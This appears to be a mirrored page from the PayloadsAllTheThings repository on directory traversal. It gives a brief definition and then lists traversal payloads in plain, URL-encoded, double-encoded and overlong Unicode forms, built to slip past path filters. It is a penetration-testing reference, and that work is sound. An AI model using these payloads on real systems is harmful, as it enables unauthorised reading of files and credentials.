mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-23 09:06:08 +02:00

History

Swissky b87c3fd7ff Traversal Dir + NoSQL major updates + small addons		2018-02-15 23:27:42 +01:00
..
README.md	Traversal Dir + NoSQL major updates + small addons	2018-02-15 23:27:42 +01:00
deep_traversal.txt	Traversal Dir files + Updates XSS	2016-10-21 06:12:00 +07:00
directory_traversal.txt	Traversal Dir files + Updates XSS	2016-10-21 06:12:00 +07:00
dotdotpwn.txt	Traversal Dir files + Updates XSS	2016-10-21 06:12:00 +07:00
traversals-8-deep-exotic-encoding.txt	LDAP & XPATH injection + Small fixes and payloads	2017-07-14 23:40:31 +02:00

README.md

Traversal Directory

A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

Exploit

Basic

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

16 bit Unicode encoding

. = %u002e
/ = %u2215
\ = %u2216

Double URL encoding

. = %252e
/ = %252f
\ = %255c

UTF-8 Unicode encoding

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

Thanks to

https://twitter.com/huykha10/status/962419695470174208